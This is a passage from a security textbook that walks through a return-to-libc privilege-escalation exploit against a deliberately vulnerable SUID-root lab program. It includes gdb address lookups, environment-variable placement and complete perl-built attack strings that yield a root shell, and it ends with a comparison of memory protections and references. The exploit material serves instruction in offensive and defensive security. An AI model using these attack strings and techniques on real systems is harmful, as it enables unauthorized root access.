We now have another issue to work through: the execl() call takes a NULL value as its last argument. We will deal with that in a moment. First, let’s test the execl() function call with a simple test program and ensure that it does not drop privileges when run as root:


   BT book $ cat test_execl.c
   #include <unistd.h>
   int main(){
      execl("./wrapper", "./wrapper", 0);
   }

Compile and make SUID like the vulnerable program vuln2.c:


   BT book $ gcc -o test_execl test_execl.c
   BT book $ su
   Password: ****
   BT book # chown root.root test_execl
   BT book # chmod +s test_execl
   BT book # ls -l test_execl
   -rwsr-sr-x 1 root root 8039 Dec 20 00:59 test_execl*
   BT book # exit
   exit

Run it to test the functionality:


   BT book $ ./test_execl
   sh-3.1# id
   uid=0(root) gid=0(root) groups=100(users)
   sh-3.1# exit
   exit
   BT book $

Great, we now have a way to keep the root privileges. Now all we need is a way to produce a NULL byte on the stack. There are several ways to do this; however, for illustrative purposes, we will use the printf() function as a wrapper around the execl() function. Recall that the %hn format token can be used to write into memory locations. To make this happen, we need to chain together more than one libc function call, as shown here:

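   [filler][&printf()][&execl()][&"%3$n"][&"./wrapper"][&"./wrapper"][address of this last slot]

(Lower addresses are on the left; the address of printf() overwrites the saved eip.)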

Just like we did before, we will overwrite the old saved eip with the address of the glibc printf() function. At that point, when the original vulnerable function returns, this new saved eip will be popped off the stack and printf() will be executed with the arguments starting with “%3$n”, which will write the number of bytes in the format string up to the format token (0x0000) into the third direct parameter. Since the third parameter contains the location of itself, the value of 0x0000 will be written into that spot. Next, the execl() function will be called with the arguments from the first “./wrapper” string onward. Voilà, we have created the desired execl() function on-the-fly with this self-modifying buffer attack string.

In order to build the preceding exploit, we need the following information:

• The address of the printf() function

• The address of the execl() function

• The address of the “%3$n” string in memory (we will use the environment section)

• The address of the “./wrapper” string in memory (we will use the environment section)

• The address of the location we wish to overwrite with a NULL value

Starting at the top, let’s get the addresses:


   BT book $ gdb -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main 
   Breakpoint 1 at 0x80483aa
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p printf
   $1 = {<text variable, no debug info>} 0xb7ee6580 <printf>
   (gdb) p execl
   $2 = {<text variable, no debug info>} 0xb7f2f870 <execl>
   (gdb) q
   The program is running.  Exit anyway? (y or n) y
   BT book $

We will use the environment section of memory to store our strings and retrieve their location with our handy get_env.c utility:


   BT book $ cat get_env.c
   //getenv.c
   #include <stdio.h>
   #include <stdlib.h>
   int main(int argc, char *argv[]){
     char * addr;  //pointer to the value of the requested variable
     addr = getenv(argv[1]);  //look up the variable named on the command line
     printf("%s is located at %p\n", argv[1], addr);//display location
   }

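Remember that the name of the get_env program needs to be the same length as the name of the vulnerable program, in this case vuln2 (five characters), because the length of the program name shifts the addresses of the environment variables: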


   BT book $ gcc -o gtenv get_env.c

Okay, we are ready to place the strings into memory and retrieve their locations:


   BT book $ export FMTSTR="%3\$n"  # escape the $ with a backslash
   BT book $ echo $FMTSTR
   %3$n
   BT book $ ./gtenv FMTSTR
   FMTSTR is located at 0xbffffde5
   BT book $
   BT book $ export WRAPPER="./wrapper"
   BT book $ echo $WRAPPER
   ./wrapper
   BT book $ ./gtenv WRAPPER
   WRAPPER is located at 0xbffffe02
   BT book $

We have everything except the location of the last memory slot of our buffer. To determine this value, first we find the size of the vulnerable buffer. With this simple program, we have only one internal buffer, which will be located at the top of the stack when inside the vulnerable function main(). In the real world, a little more research will be required to find the location of the vulnerable buffer by looking at the disassembly and some trial and error.


   BT book $ gdb -q vuln2
   Using host libthread_db library "/lib/tls/libthread_db.so.1".
   (gdb) b main
   Breakpoint 1 at 0x80483aa 
   (gdb) r
   Starting program: /mnt/sda1/book/book/vuln2

   Breakpoint 1, 0x080483aa in main ()
   (gdb) disas main
   Dump of assembler code for function main:
   0x080483a4 <main+0>:  push  %ebp
   0x080483a5 <main+1>:  mov  %esp,%ebp
   0x080483a7 <main+3>:  sub  $0x18,%esp
   <truncated for brevity>

Now that we know the size of the vulnerable buffer and compiler-added padding (0x18 = 24), we can calculate the location of the sixth memory address. The 24 reserved bytes are followed by six 4-byte values (the saved ebp and the five values that precede our target), so the offset is 24 + 6*4 = 48 = 0x30. Since we will place 4 bytes in that last location, the total size of the attack buffer will be 52 bytes.

Next, we will send a representative-size (52 bytes) buffer into our vulnerable program and find the location of the beginning of the vulnerable buffer with gdb by printing the value of $esp:


   (gdb)  r `perl -e 'print "AAAA"x13'`Quit
   Starting program: /mnt/sda1/book/book/vuln2 `perl -e 'print "AAAA"x13'`Quit

   Breakpoint 1, 0x080483aa in main ()
   (gdb) p $esp
   $1 = (void *) 0xbffff560
   (gdb) q
   The program is running.  Exit anyway? (y or n) y
   BT book $

Now that we have the location of the beginning of the buffer, add the calculated offset from earlier to get the correct target location (sixth memory slot after our overflowed buffer):


   0xbffff560 + 0x30 = 0xbffff590

Finally, we have all the data we need, so let’s attack!


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "\x80\x65\xee\xb7"."\x70\xf8\xf2\xb7"."\xe5\xfd\xff\xbf"."\x02\xfe\xff\xbf".
   "\x02\xfe\xff\xbf"."\x90\xf5\xff\xbf"' `
   sh-3.1# exit
   exit
   BT book $

Woot! It worked. Some of you may have realized that a shortcut exists here. If you look at the last illustration, you will notice that the last value of the attack string is a NULL. Occasionally, you will run into this situation. In that rare case, you don’t care if you pass a NULL byte into the vulnerable program, as the string will be terminated by a NULL anyway. So, in this canned scenario, you could have removed the printf() function and simply fed the execl() attack string as follows:


   ./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][\x00]

Try it:


   BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
   "\x70\xf8\xf2\xb7"."\xa0\xe3\xec\xb7"."\x02\xfe\xff\xbf"."\x02\xfe\xff\xbf".
   "\x00"' `
   sh-3.1# exit
   exit
   BT book $

Both ways work in this case. You will not always be as lucky, so you need to know both ways. See the “References” section for even more creative ways to return to libc.

Bottom Line

Now that we have discussed some of the more common techniques used for memory protection, how do they stack up? Of the ones we reviewed, ASLR (PaX and PIE) and non-executable memory (PaX and ExecShield) provide protection to both the stack and the heap. StackGuard, StackShield, SSP, and Libsafe provide protection against stack-based attacks only. The following table shows the differences in the approaches.

[Table: comparison of the memory protection schemes]

References

Exploiting Software: How to Break Code (Greg Hoglund and Gary McGraw) Addison-Wesley, 2004

“Getting Around Non-executable Stack (and Fix)” (Solar Designer) www.imchris.org/projects/overflows/returntolibc1.html

Hacking: The Art of Exploitation (Jon Erickson) No Starch Press, 2003

Advanced return-into-lib(c) Exploits (PaX Case Study) (nergal) www.phrack.com/issues.html?issue=58&id=4#article

Shaun2k2’s libc exploits www.exploit-db.com/exploits/13197/

The Shellcoder’s Handbook: Discovering and Exploiting Security Holes (Jack Koziol et al.) Wiley, 2004
